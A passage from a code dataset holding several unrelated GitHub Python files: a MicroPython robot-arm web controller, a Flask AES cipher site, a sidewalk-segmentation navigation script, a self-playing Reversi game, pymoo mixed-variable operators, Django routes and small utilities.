position_actuelle:\n        for i in range(position_actuelle, nouvelle_position):\n            servo_bras_3.duty(i)\n            time.sleep_ms(30)\n    if nouvelle_position < position_actuelle:\n        for i in range(position_actuelle, nouvelle_position, -1):\n            servo_bras_3.duty(i)\n            time.sleep_ms(30)\n    position_bras_3 = 
nouvelle_position\n\n\ndef pince(nouvelle_position):\n # positionne la pince\n global position_pince\n position_actuelle = position_pince\n if nouvelle_position >= position_actuelle:\n for i in range(position_actuelle, nouvelle_position):\n servo_pince.duty(i)\n time.sleep_ms(30)\n if nouvelle_position < position_actuelle:\n for i in range(position_actuelle, nouvelle_position, -1):\n servo_pince.duty(i)\n time.sleep_ms(30)\n position_pince = nouvelle_position\n\ndef mouvements_init():\n # clic sur bouton 'init', on initialise le scenario\n global mouvements_pivot, mouvements_bras_1\n global mouvements_bras_2, mouvements_bras_3, mouvements_pince\n mouvements_pivot = []\n mouvements_bras_1 = []\n mouvements_bras_2 = []\n mouvements_bras_3 = []\n mouvements_pince = []\n \ndef mouvements_sauve():\n # clic sur bouton 'sauve', on sauvegarde chaque servo\n global mouvements_pivot, mouvements_bras_1\n global mouvements_bras_2, mouvements_bras_3, mouvements_pince\n mouvements_pivot.append(position_pivot)\n mouvements_bras_1.append(position_bras_1)\n mouvements_bras_2.append(position_bras_2)\n mouvements_bras_3.append(position_bras_3)\n mouvements_pince.append(position_pince)\n\ndef mouvements_play():\n # clic sur bouton 'executer une fois', on execute une seule\n # fois les différentes positions des servos\n mouvements = len(mouvements_pivot)\n for mouvement in range(0, mouvements):\n pivot(mouvements_pivot[mouvement])\n bras_1(mouvements_bras_1[mouvement])\n bras_2(mouvements_bras_2[mouvement])\n bras_3(mouvements_bras_3[mouvement])\n pince(mouvements_pince[mouvement])\n time.sleep_ms(100)\n \ndef mouvements_play_infini():\n # clic sur bouton 'executer en boucle', on execute en boucle\n # les différentes positions des servos\n global play_infini\n while play_infini: # thread lance\n mouvements = len(mouvements_pivot)\n for mouvement in range(0, mouvements):\n pivot(mouvements_pivot[mouvement])\n bras_1(mouvements_bras_1[mouvement])\n bras_2(mouvements_bras_2[mouvement])\n bras_3(mouvements_bras_3[mouvement])\n pince(mouvements_pince[mouvement])\n time.sleep_ms(100)\n \nip = config_wifi()\ncommunication = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ncommunication.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\ncommunication.bind((ip, 80)) # liaison port http--> TCP 80\ncommunication.listen(5)\ninitialisation_bras()\n\nwhile True:\n client_sock, addr = communication.accept() # attente connexion du client\n requete = client_sock.recv(1024) # on recupere la requete\n requete = str(requete)\n if requete.find('GET /construit_xml') > 0: # on construit le XML de base\n if not play_infini: # si le tread ne tourne pas\n construit_xml() # construit le xml avec les positions des servos\n client_sock.send(XML) # met a jour la page html concernant les sliders\n elif requete.find('GET /set_servo') > 0: # un slider a ete deplace\n play_infini = False # quitte le thread\n tempo1 = requete.find('set_servo') # recupere l'emplacement set_servo\n tempo2 = requete.find(' ', tempo1) # recupere l'emplacement 1er espace\n numero_slider = requete[tempo1 + 9] # recupere le numero de servo\n valeur_slider = requete[tempo1 + 11 : tempo2] # recupere la position du slider\n if numero_slider == \"0\": # on traite le servo moteur du pivot\n pivot(int(valeur_slider)) # positione le pivot\n construit_xml()\n client_sock.send(XML) # met a jour la page html concernant les sliders\n if numero_slider == \"1\": # on traite le servo moteur du bras 1\n bras_1(int(valeur_slider))\n construit_xml()\n client_sock.send(XML) # met 
a jour la page html concernant les sliders\n if numero_slider == \"2\": # on traite le servo moteur du bras 2\n bras_2(int(valeur_slider))\n construit_xml()\n client_sock.send(XML) # met a jour la page html concernant les sliders\n if numero_slider == \"3\": # on traite le servo moteur du bras 3\n bras_3(int(valeur_slider))\n construit_xml()\n client_sock.send(XML) # met a jour la page html concernant les sliders\n if numero_slider == \"4\": # on traite le servo moteur de la pince\n pince(int(valeur_slider))\n construit_xml()\n client_sock.send(XML) # met a jour la page html concernant les sliders \n elif requete.find('GET /?CMD=init_scenario') > 0:\n # appuie sur le bouton 'init'\n play_infini = False # quitte le thread\n # on envoi la page HTML\n with open('robot_arm_web.html', 'r') as html: \n client_sock.send(html.read())\n mouvements_init()\n elif requete.find('GET /?CMD=sauve') > 0:\n # appuie sur le bouton 'sauve'\n play_infini = False # quitte le thread\n # on envoi la page HTML\n with open('robot_arm_web.html', 'r') as html: \n client_sock.send(html.read())\n # enregistre la position\n mouvements_sauve()\n elif requete.find('GET /?CMD=play_one') > 0:\n # appuie sur le bouton 'executer une fois'\n play_infini = False # quitte le thread\n # on envoi la page HTML\n with open('robot_arm_web.html', 'r') as html: \n client_sock.send(html.read())\n # execute les mouvements sauvegardes\n mouvements_play()\n elif requete.find('GET /?CMD=play_infini') > 0:\n # appuie sur le bouton 'executer en boucle'\n # on envoi la page HTML\n with open('robot_arm_web.html', 'r') as html: \n client_sock.send(html.read())\n if not play_infini: # on verifie que le thread ne tourne pas deja\n play_infini = True # autorise le thread a se lancer\n # on lance le Thread qui tourne en tâche de fond\n _thread.start_new_thread(mouvements_play_infini, ())\n else:\n # on envoi la page HTML\n with open('robot_arm_web.html', 'r') as html: \n client_sock.send(html.read())\n client_sock.close() # fermeture de la connexion du client","repo_name":"itechnofrance/micropython","sub_path":"robotique/robot_arm/robot_arm_web.py","file_name":"robot_arm_web.py","file_ext":"py","file_size_in_byte":11085,"program_lang":"python","lang":"fr","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"32004171372","text":"from flask import Flask, flash, render_template, url_for, request, redirect\nfrom datetime import datetime\nimport config\nimport cipher\n\n# app settings\napp = Flask(__name__)\napp.enc_key = config.ENCRYPT_KEY\napp.secret_key = config.SECRET_KEY\napp.url_map.strict_slashes = False\napp.DEBUG = config.DEBUG\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n message = 'Welcome to pycipher.net. Please enter your string to encrypt!'\n\n return render_template(\n 'index.html',\n message=message\n )\n\n\n@app.route('/encrypt', methods=['GET', 'POST'])\ndef encrypt():\n \"\"\"\n Encrypt function\n \"\"\"\n encrypted_string = None\n\n if request.method == 'POST':\n payload = request.form['enc_val'].strip()\n\n if len(payload) != 0:\n try:\n _cipher = cipher.AESCipher(app.enc_key)\n encrypted_string = _cipher.encrypt(payload)\n except (ValueError, TypeError) as e:\n return 'Sorry, an error has occurred ' + str(e)\n\n else:\n encrypted_string = None\n flash('Can not encrypt an empty string. 
Please try again...')\n\n return render_template(\n 'encrypt.html',\n encrypted_string=encrypted_string\n )\n\n\n@app.route('/decrypt', methods=['GET', 'POST'])\ndef decrypt():\n \"\"\"\n Decrypt function\n \"\"\"\n decrypted_string = None\n\n if request.method == 'POST':\n payload = request.form['enc_val'].strip()\n\n if len(payload) != 0:\n if len(payload) % 2 == 0:\n try:\n _cipher = cipher.AESCipher(app.enc_key)\n decrypted_string = _cipher.decrypt(payload)\n except (ValueError, TypeError) as e:\n return 'Sorry, an error has occurred ' + str(e)\n else:\n decrypted_string = None\n flash('The input string must be a multiple of 16 in order to decrypt. \\\n Please check your input and try again.')\n\n else:\n decrypted_string = None\n flash('Sorry, can not decrypt an empty string. Please check your input and try again...')\n\n return render_template(\n 'decrypt.html',\n decrypted_string=decrypted_string\n )\n\n\n@app.route('/aes', methods=['GET'])\ndef aes():\n return render_template(\n 'aes.html'\n )\n\n\n@app.route('/about', methods=['GET'])\ndef about():\n return render_template(\n 'about.html'\n )\n\n\n@app.route('/docs', methods=['GET'])\ndef docs():\n return render_template(\n 'docs.html'\n )\n\n\n@app.route('/tos', methods=['GET'])\ndef tos():\n return render_template(\n 'tos.html'\n )\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template(\n '404.html'\n ), 404\n\n\n@app.errorhandler(500)\ndef server_error(e):\n return render_template(\n '500.html'\n ), 500\n\n\nif __name__ == '__main__':\n app.run(\n '0.0.0.0',\n debug=app.DEBUG,\n )\n\n\n\n","repo_name":"craigderington/pycipher","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38385158070","text":"import cv2\nimport numpy as np\nimport torch\nfrom torchvision import transforms\nfrom modules.dataloaders.utils import decode_segmap\nfrom modules.models.deeplab_xception import DeepLabv3_plus\nfrom modules.models.sync_batchnorm.replicate import patch_replication_callback\nfrom PIL import Image\nimport os.path as osp\n\nimport aigo_destination_route\nimport threading\n#from ublox_gps import UbloxGps\nimport serial\nimport math\n\n\n#aigo_destination_route.get_route(\"경희대학교 중앙도서관\")\n\n\n\n#임시 linestring 향후 linestring.txt 파싱 후\nlinestring = [[127.08341510840815, 37.240436069188185] , #출발\n [127.08341233624519, 37.24024442466403 ], #도로 인식 후 보행자도로 gps로 교체\n [127.08212911848908, 37.24027217627202 ],\n [127.08205412528905, 37.240272174930624 ],\n [127.08013207664933, 37.24029713765783 ],\n [127.07963767687961, 37.24030268372765 ],\n [127.07956268360199, 37.24030545984253 ],\n [127.07943769454693, 37.240319344887844 ],\n [127.07924326470169, 37.240427662200275 ]]\n\nglobal current_point\ncurrent_point = 0\n\ndef gpsTracking():\n port = serial.Serial('/dev/ttyACM0', baudrate=460800, timeout=1)\n gps = UbloxGps(port)\n \n global g_lon #다른 함수에서 받아올 현재 lon, lat\n global g_lat\n global current_point\n global point_check\n point_check = 0\n with open('points.txt', 'r') as points:\n currentline = points.readline()\n splitline = currentline.split(',')\n while True:\n try: \n coords = gps.geo_coords()\n print(coords.lon, coords.lat)\n current_location_lon = coords.lon\n current_location_lat = coords.lat\n g_lon = current_location_lon\n g_lat = current_location_lat\n except (ValueError, IOError) as err:\n print(err) \n\n if(point_check == 1):\n currentline = points.readline()\n 
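# (editor's note) an empty line means points.txt is exhausted: the break below ends the tracking loop and the port is closed\n                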
if(currentline == ''):\n                    break\n                splitline = currentline.split(',')\n                point_check = 0\n\n            point_lon = float(splitline[0])\n            point_lat = float(splitline[1])\n            route_info = splitline[2]\n\n            PTCdistance = math.sqrt((point_lon-current_location_lon)**2 + (point_lat-current_location_lat)**2)\n            if (PTCdistance<=0.00001):\n                print(route_info)\n                point_check = 1\n                current_point+=1\n \n    port.close()\n\n# t1 = threading.Thread(target=gpsTracking)\n# t1.start()\n\n\n\nMODEL_PATH = \"./run/surface/deeplab/model_best.pth.tar\"\nORIGINAL_HEIGHT = 480\nORIGINAL_WIDTH = 640\nMODEL_HEIGHT = 480 #512\nMODEL_WIDTH = 640 #1024\nNUM_CLASSES = 4 # including background\nCUDA = True if torch.cuda.is_available() else False\n\nMODE = 'jpg' # 'mp4' or 'jpg'\nOVERLAPPING = True # whether to mix segmentation map and original image\n\nCUSTOM_COLOR_MAP = [\n    [0, 0, 0], # background\n    [255, 0, 255], # crosswalk\n    [255, 0, 0], # roadway\n    [0, 255, 0], # sidewalk\n] # To ignore unused classes while predicting\nCUSTOM_N_CLASSES = len(CUSTOM_COLOR_MAP)\n\nclass ModelWrapper:\n    def __init__(self):\n        self.composed_transform = transforms.Compose([\n            transforms.Resize((MODEL_HEIGHT, MODEL_WIDTH), interpolation=Image.BILINEAR),\n            transforms.ToTensor(),\n            transforms.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225))])\n\n        self.model = self.load_model(MODEL_PATH)\n\n    @staticmethod\n    def load_model(model_path):\n        model = DeepLabv3_plus(nInputChannels=3, n_classes=NUM_CLASSES, os=16)\n        if CUDA:\n            model = torch.nn.DataParallel(model, device_ids=[0])\n            patch_replication_callback(model)\n            model = model.cuda()\n        if not osp.isfile(MODEL_PATH):\n            raise RuntimeError(\"=> no checkpoint found at '{}'\".format(model_path))\n        checkpoint = torch.load(model_path) #, map_location=torch.device('cpu')\n        if CUDA:\n            model.module.load_state_dict(checkpoint['state_dict'])\n        else:\n            model.load_state_dict(checkpoint['state_dict'])\n        print(\"=> loaded checkpoint '{}' (epoch: {}, best_pred: {})\"\n              .format(model_path, checkpoint['epoch'], checkpoint['best_pred']))\n        model.eval()\n        return model\n\n    def predict(self, rgb_img: np.array):\n        x = self.composed_transform(Image.fromarray(rgb_img))\n        x = x.unsqueeze(0)\n\n        if CUDA:\n            x = x.cuda()\n        with torch.no_grad():\n            output = self.model(x)\n        pred = output.data.detach().cpu().numpy()\n        pred = np.argmax(pred, axis=1).squeeze(0)\n        segmap = decode_segmap(pred, dataset='custom', label_colors=CUSTOM_COLOR_MAP, n_classes=CUSTOM_N_CLASSES)\n        segmap = np.array(segmap * 255).astype(np.uint8)\n\n        resized = cv2.resize(segmap, (ORIGINAL_WIDTH, ORIGINAL_HEIGHT),\n                             interpolation=cv2.INTER_NEAREST)\n        return resized\n\nmodel_wrapper = ModelWrapper()\n\ncapture = cv2.VideoCapture(0)\n\n\nidx = np.array([320])\n\nroad_way_count = 0 \n\ng_lon, g_lat = 127.08341510840815, 37.240436069188185 # 도로를 인식한 위치라 가정\ncurrent_point = 1\nwhile True:\n    ret, frame = capture.read()\n\n    if ret == False:\n        continue\n \n    segmap = model_wrapper.predict(frame)\n \n    if OVERLAPPING:\n        h, w, _ = np.array(segmap).shape\n        img_resized = cv2.resize(frame, (w, h))\n        result = (img_resized * 0.5 + segmap * 0.5).astype(np.uint8)\n    else:\n        result = segmap\n\n    # boundary = np.where((result[:,:,0] == 255)&(result[:,:,1] == 0)&(result[:,:,2] == 0))\n    # print(boundary)\n    # print(result.shape)\n\n    detect_array = result[200:265,320:330]\n    boolean_indexing = (detect_array[:,:,0] == 255)&(detect_array[:,:,1] == 0)&(detect_array[:,:,2] == 0)\n    boolean_set = np.unique(boolean_indexing)\n    # bugfix (editor): '&' binds tighter than '==' in Python, so the original test\n    # 'boolean_set.size == 1 & boolean_set[0] == True' compared size against (1 & boolean_set[0]);\n    # 'and' expresses the intended check\n    if(boolean_set.size == 1 and boolean_set[0] == True):\n        
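# every pixel of the sampled window was classified as roadway (pure red in CUSTOM_COLOR_MAP), so count this frame\n        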
road_way_count+=1\n\n print(road_way_count)\n\n if(road_way_count == 100):\n imu = \"South\" # mqtt로 받아옴 , current_point = 1\n if(imu == \"South\"):\n direction = g_lon - linestring[current_point+1][0]\n if(direction > 0):\n next_point_lon = g_lon - 0.00005 # green확인 후 이동\n next_point_lat = g_lat\n linestring.insert(current_point+1,[next_point_lon,next_point_lat])\n print(linestring)\n\n\n\n\n cv2.imshow('image', result[200:265,320:330])\n cv2.imshow('image2', result)\n key = cv2.waitKey(1)\n if key == 27:\n break","repo_name":"hongju-jeong/segmentation-selectstar-live","sub_path":"live.py","file_name":"live.py","file_ext":"py","file_size_in_byte":6894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"134167823","text":"import tkinter\nimport tkinter.messagebox\nimport random\n\nscore = [0]*3 # 対戦結果\nmatch = 0 # 対戦回数\n\nFS = (\"Times New Roman\", 30)\nFL = (\"Times New Roman\", 60)\nBLACK = 1\nWHITE = 2\nproc = 0\nturn = 0\nmsg = \"\"\nspace = 0\ncolor = [0]*2\nboard = []\nback = []\nfor y in range(8):\n board.append([0]*8)\n back.append([0]*8)\n\ndef banmen():\n cvs.delete(\"all\")\n cvs.create_text(320, 670, text=msg, fill=\"silver\", font=FS)\n for y in range(8):\n for x in range(8):\n X = x*80\n Y = y*80\n cvs.create_rectangle(X, Y, X+80, Y+80, outline=\"black\")\n if board[y][x]==BLACK:\n cvs.create_oval(X+10, Y+10, X+70, Y+70, fill=\"black\", width=0)\n if board[y][x]==WHITE:\n cvs.create_oval(X+10, Y+10, X+70, Y+70, fill=\"white\", width=0)\n cvs.update()\n\ndef ban_syokika():\n global space\n space = 60\n for y in range(8):\n for x in range(8):\n board[y][x] = 0\n board[3][4] = BLACK\n board[4][3] = BLACK\n board[3][3] = WHITE\n board[4][4] = WHITE\n\n# 石を打ち、相手の石をひっくり返す\ndef ishi_utsu(x, y, iro):\n board[y][x] = iro\n for dy in range(-1, 2):\n for dx in range(-1, 2):\n k = 0\n sx = x\n sy = y\n while True:\n sx += dx\n sy += dy\n if sx<0 or sx>7 or sy<0 or sy>7:\n break\n if board[sy][sx]==0:\n break\n if board[sy][sx]==3-iro:\n k += 1\n if board[sy][sx]==iro:\n for i in range(k):\n sx -= dx\n sy -= dy\n board[sy][sx] = iro\n break\n\n# そこに打つといくつ返せるか数える\ndef kaeseru(x, y, iro):\n if board[y][x]>0:\n return -1 # 置けないマス\n total = 0\n for dy in range(-1, 2):\n for dx in range(-1, 2):\n k = 0\n sx = x\n sy = y\n while True:\n sx += dx\n sy += dy\n if sx<0 or sx>7 or sy<0 or sy>7:\n break\n if board[sy][sx]==0:\n break\n if board[sy][sx]==3-iro:\n k += 1\n if board[sy][sx]==iro:\n total += k\n break\n return total\n\n# 打てるマスがあるか調べる\ndef uteru_masu(iro):\n for y in range(8):\n for x in range(8):\n if kaeseru(x, y, iro)>0:\n return True\n return False\n\n# 黒い石、白い石、いくつかあるか数える\ndef ishino_kazu():\n b = 0\n w = 0\n for y in range(8):\n for x in range(8):\n if board[y][x]==BLACK: b += 1\n if board[y][x]==WHITE: w += 1\n return b, w\n\n#コンピュータの思考ルーチン\ndef computer_0(iro): # ランダムに打つ\n while True:\n rx = random.randint(0, 7)\n ry = random.randint(0, 7)\n if kaeseru(rx, ry, iro)>0:\n return rx, ry\n\npoint = [\n [6,2,5,4,4,5,2,6],\n [2,1,3,3,3,3,1,2],\n [5,3,3,3,3,3,3,5],\n [4,3,3,0,0,3,3,4],\n [4,3,3,0,0,3,3,4],\n [5,3,3,3,3,3,3,5],\n [2,1,3,3,3,3,1,2],\n [6,2,5,4,4,5,2,6]\n]\ndef computer_1(iro): # 優先的に打つべきマスを選ぶ\n sx = 0\n sy = 0\n p = 0\n for y in range(8):\n for x in range(8):\n if kaeseru(x, y, iro)>0 and point[y][x]>p:\n p = point[y][x]\n sx = x\n sy = y\n return sx, sy\n\n# モンテカルロ法による思考ルーチン\ndef save():\n for y in range(8):\n for x in range(8):\n back[y][x] = board[y][x]\n\ndef load():\n for y in range(8):\n for x in range(8):\n 
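# restore each square from the backup taken by save() before the random playouts\n            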
board[y][x] = back[y][x]\n\ndef uchiau(iro):\n while True:\n if uteru_masu(BLACK)==False and uteru_masu(WHITE)==False:\n break\n iro = 3-iro\n if uteru_masu(iro)==True:\n while True:\n x = random.randint(0, 7)\n y = random.randint(0, 7)\n if kaeseru(x, y, iro)>0:\n ishi_utsu(x, y, iro)\n break\n\ndef computer_2(iro, loops):\n global msg\n win = [0]*64\n save()\n for y in range(8):\n for x in range(8):\n if kaeseru(x, y, iro)>0:\n msg += \".\"\n banmen()\n win[x+y*8] = 1\n for i in range(loops):\n ishi_utsu(x, y, iro)\n uchiau(iro)\n b, w = ishino_kazu()\n if iro==BLACK and b>w:\n win[x+y*8] += 1\n if iro==WHITE and w>b:\n win[x+y*8] += 1\n load()\n m = 0\n n = 0\n for i in range(64):\n if win[i]>m:\n m = win[i]\n n = i\n x = n%8\n y = int(n/8)\n return x, y\n\ndef main():\n global proc, turn, msg, space, match\n banmen()\n if proc==0: # タイトル画面\n cvs.create_text(320, 200, text=\"Reversi AUTO\", fill=\"gold\", font=FL)\n ban_syokika()\n color[0] = BLACK\n color[1] = WHITE\n turn = 0\n proc = 1\n elif proc==1: # どちらの番か表示\n msg = \"アルゴリズム \"+str(turn)+\" 思考中\"\n proc = 2\n elif proc==2: # 石を打つマスを決める\n if turn==0: # アルゴリズム 先手\n cx, cy = computer_1(color[turn])\n ishi_utsu(cx, cy, color[turn])\n space -= 1\n proc = 3\n else: # アルゴリズム 後手\n cx, cy = computer_2(color[turn], 30)\n ishi_utsu(cx, cy, color[turn])\n space -= 1\n proc = 3\n elif proc==3: # 打つ番を交代\n msg = \"\"\n turn = 1-turn\n proc = 4\n elif proc==4: # 打てるマスがあるか\n if space==0:\n proc = 5\n elif uteru_masu(BLACK)==False and uteru_masu(WHITE)==False:\n msg = \"どちらも打てないので終了\"\n proc = 5\n elif uteru_masu(color[turn])==False:\n msg = \"COM\"+str(turn)+\"は打てるマスがないのでパス\"\n proc = 3\n else:\n proc = 1\n elif proc==5: # 勝敗判定\n b, w = ishino_kazu()\n if (color[0]==BLACK and b>w) or (color[0]==WHITE and w>b):\n score[0] += 1\n elif (color[1]==BLACK and b>w) or (color[1]==WHITE and w>b):\n score[1] += 1\n else:\n score[2] += 1\n\n # 結果を表示する\n match += 1\n print(\"--------------------\")\n print(\"対戦回数\", match)\n print(\"黒\", b, \" 白\", w)\n print(\"COM(先手) WIN\", score[0])\n print(\"COM(後手) WIN\", score[1])\n print(\"DRAW\", score[2]) \n if match%100==0:\n tkinter.messagebox.showinfo(\"\", \"100試合ごとに一時停止します\")\n proc = 0\n root.after(1, main) # アルゴリズムの対戦 100msecを1msec\n\nroot = tkinter.Tk()\nroot.title(\"リバーシ\")\nroot.resizable(False, False)\ncvs = tkinter.Canvas(width=640, height=700, bg=\"green\")\ncvs.pack()\nroot.after(100, main)\nroot.mainloop()\n","repo_name":"tossy0130/python_game_algorithm_01","sub_path":"PyG_algorithm/Chapter8/reversi_auto.py","file_name":"reversi_auto.py","file_ext":"py","file_size_in_byte":7260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9354067440","text":"import numpy as np\n\nfrom pymoo.model.crossover import Crossover\nfrom pymoo.model.mutation import Mutation\nfrom pymoo.model.sampling import Sampling\n\n\ndef prepare_processing(mask, operators):\n process = []\n\n # create a numpy array of mask if it is not yet\n mask = np.array(mask)\n\n for val in np.unique(mask):\n\n # check if operator for that type was defined\n if val not in operators:\n raise Exception(\"Operator for type %s was not defined.\" % val)\n\n # append it as a processing type\n process.append({\n \"type\": val,\n \"mask\": mask == val,\n \"operator\": operators[val]\n })\n\n return process\n\n\ndef apply_mixed_variable_operation(problem, process, fun):\n\n # the result to be returned\n ret = []\n\n # save the original bounds of the problem\n _n_var, _xl, _xu = problem.n_var, 
problem.xl, problem.xu\n\n # iterate through all the different operators that should be applied\n for entry in process:\n # get the mask and the operator\n mask, operator = entry[\"mask\"], entry[\"operator\"]\n\n # copy the arrays of the problem and cast them to float\n problem.n_var, problem.xl, problem.xu = mask.sum(), _xl[mask], _xu[mask]\n\n # perform the crossover\n ret.append(fun(mask, operator))\n\n # reset the original bounds of the problem\n problem.n_var = _n_var\n problem.xl = _xl\n problem.xu = _xu\n\n return ret\n\n\ndef concatenate_mixed_variables(problem, process, ret):\n # find the minimum of returned individuals and make them equal among operators\n n_rows = min([len(e) for e in ret])\n ret = [e[:n_rows] for e in ret]\n\n # create the result array and set the values for each operator\n X = np.full((n_rows, problem.n_var), np.nan, dtype=np.object)\n\n for i in range(len(process)):\n mask, _X = process[i][\"mask\"], ret[i]\n X[:, mask] = _X\n\n return X\n\n\nclass MixedVariableCrossover(Crossover):\n\n def __init__(self, mask, operators):\n\n n_parents = np.unique(np.array([op.n_parents for op in operators.values()]))\n if len(n_parents) > 1:\n raise Exception(\"All crossovers need to have the same number of parents!\")\n\n n_offsprings = np.unique(np.array([op.n_offsprings for op in operators.values()]))\n if len(n_offsprings) > 1:\n raise Exception(\"All crossovers need to have the same number of offsprings!\")\n\n super().__init__(n_parents[0], n_offsprings[0])\n self.process = prepare_processing(mask, operators)\n\n def _do(self, problem, X, **kwargs):\n\n _, n_matings, n_var = X.shape\n\n def fun(mask, operator):\n return operator._do(problem, X[..., mask], **kwargs)\n\n ret = apply_mixed_variable_operation(problem, self.process, fun)\n\n # for the crossover the concatenation is different through the 3d arrays.\n X = np.full((self.n_offsprings, n_matings, n_var), np.nan, dtype=np.object)\n for i in range(len(self.process)):\n mask, _X = self.process[i][\"mask\"], ret[i]\n X[..., mask] = _X\n\n return X\n\n\nclass MixedVariableMutation(Mutation):\n\n def __init__(self, mask, operators):\n super().__init__()\n self.process = prepare_processing(mask, operators)\n\n def _do(self, problem, X, **kwargs):\n def fun(mask, operator):\n return operator._do(problem, X[:, mask], **kwargs)\n\n ret = apply_mixed_variable_operation(problem, self.process, fun)\n return concatenate_mixed_variables(problem, self.process, ret)\n\n\nclass MixedVariableSampling(Sampling):\n\n def __init__(self, mask, operators):\n super().__init__()\n self.process = prepare_processing(mask, operators)\n\n def _do(self, problem, n_samples, **kwargs):\n def fun(mask, operator):\n return operator._do(problem, n_samples, **kwargs)\n\n ret = apply_mixed_variable_operation(problem, self.process, fun)\n return concatenate_mixed_variables(problem, self.process, ret)\n","repo_name":"AIasd/ADFuzz","sub_path":"pymoo/pymoo/operators/mixed_variable_operator.py","file_name":"mixed_variable_operator.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"10231402939","text":"import logging\nlogging.basicConfig(level = logging.DEBUG, format= '%(asctime)s - %(levelname)s %(message)s')\n#this hides all logging\n#logging.disable(logging.CRITICAL)\nlogging.debug('Start of program')\ndef factorial(n):\n logging.debug('Start of factorial(%s%%)' % (n))\n total = 1\n#this is where d error is so I will replace it with line 9 fix d 
bug\n# for i in range(n+ 1):\n    for i in range(1, n +1):\n        total *= i\n        logging.debug('i is ' + str(i) + ', total is ' + str(total))\n    logging.debug('End of factorial(%s%%)' % (n))\n    return total\nprint(factorial(5))\nlogging.debug('End of program')","repo_name":"Zcamm7417/zip-file","sub_path":"debuggingWithLoggingModule.py","file_name":"debuggingWithLoggingModule.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35752756413","text":"\"\"\"mysite URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n    https://docs.djangoproject.com/en/3.0/topics/http/urls/\r\nExamples:\r\nFunction views\r\n    1. Add an import:  from my_app import views\r\n    2. Add a URL to urlpatterns:  path('', views.home, name='home')\r\nClass-based views\r\n    1. Add an import:  from other_app.views import Home\r\n    2. Add a URL to urlpatterns:  path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n    1. Import the include() function: from django.urls import include, path\r\n    2. Add a URL to urlpatterns:  path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.contrib import admin\r\nfrom django.urls import path,include\r\nfrom website.views import *\r\nfrom django.conf.urls import url\r\nfrom mysite import settings\r\nfrom django.views.static import serve\r\n\r\n\r\n\r\nurlpatterns = [\r\n    # NB (editor): the '<...>' converters in the routes below were stripped when this\r\n    # file was extracted; they are reconstructed here and the parameter names are guesses\r\n    url(r'^static/(?P<path>.*)$',serve,{'document_root':settings.STATIC_ROOT},name='static'),\r\n    path('index/', index),\r\n    path('appendix/', appendix),\r\n    path('appendix2/', appendix2),\r\n    path('directions/<str:start>/<str:end>/', directions), \r\n    path('directions/', directions), \r\n    path('introduction/', introduction),\r\n    path('name_search/', name_search),\r\n    path('news/', news),\r\n    path('news_detail/<int:id>/', news_detail),\r\n    path('resource/<str:category>/', resource),\r\n    path('resource/', resource),\r\n    path('resource_learning/', resource_learning),\r\n    path('resource_download/', resource_download),\r\n    path('search_list/', search_list),\r\n    path('search_notlist/', search_notlist),\r\n    path('search_result/', search_result),\r\n    path('site_search/', site_search),\r\n    path('sitemap/', sitemap),\r\n    path('thesaurus/', thesaurus),\r\n    path('backend_login/', backend_login),\r\n    #for solr\r\n    path('solr_search/', solr_search),\r\n    path('download_resource/', download_resource),\r\n]\r\n","repo_name":"tingggyu/-","sub_path":"hakkadict/mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34298792477","text":"def clean_headers(raw_headers: str):\n    is_name = True\n    name: str = ''\n    headers = {}\n    for i, line in enumerate(filter(None, raw_headers.splitlines())):\n        if not is_name:\n            headers[name] = line\n            is_name = True\n            continue\n\n        if line[-1] != ':':\n            raise ValueError(f'Unexpected string: {line} on {i + 1}th line.')\n\n        name = line.removesuffix(':')\n        is_name = False\n\n    return headers\n","repo_name":"ilotoki0804/requests-utils","sub_path":"resoup/header_utils.py","file_name":"header_utils.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43437341288","text":"import json\nfrom uuid import UUID\n\n\nclass LikeEncoder(json.JSONEncoder):\n\n    def default(self, obj):\n        if isinstance(obj, UUID):\n            return obj.hex\n        try:\n            to_serialize = {\n                'post_id': obj.post_id.hex,\n                'author_id': 
obj.author_id\n }\n return to_serialize\n except AttributeError:\n return super().default(obj)\n","repo_name":"mgodkowicz/PostsService","sub_path":"application/serializers/like_serializers.py","file_name":"like_serializers.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23258650607","text":"# -*- coding: utf-8 -*- \nfrom selenium import webdriver\nfrom time import sleep\n\ndriver = webdriver.Chrome('/Users/jeongjin-a/Desktop/craw/chromedriver')\ndriver.implicitly_wait(3)\n\nlast_num = 813\n\n\nwhile True:\n\tdriver.get('http://job.postech.ac.kr/index.php/sample-page/?pageid=1&mod=list&category1=%EC%B1%84%EC%9A%A9%EA%B3%B5%EA%B3%A0')\n\n\trecent_num = driver.find_element_by_xpath('//*[@id=\"kboard-default-list\"]/div[4]/table/tbody/tr[1]/td[1]').text\n\n\twhile True:\n\t\tif int(recent_num) > 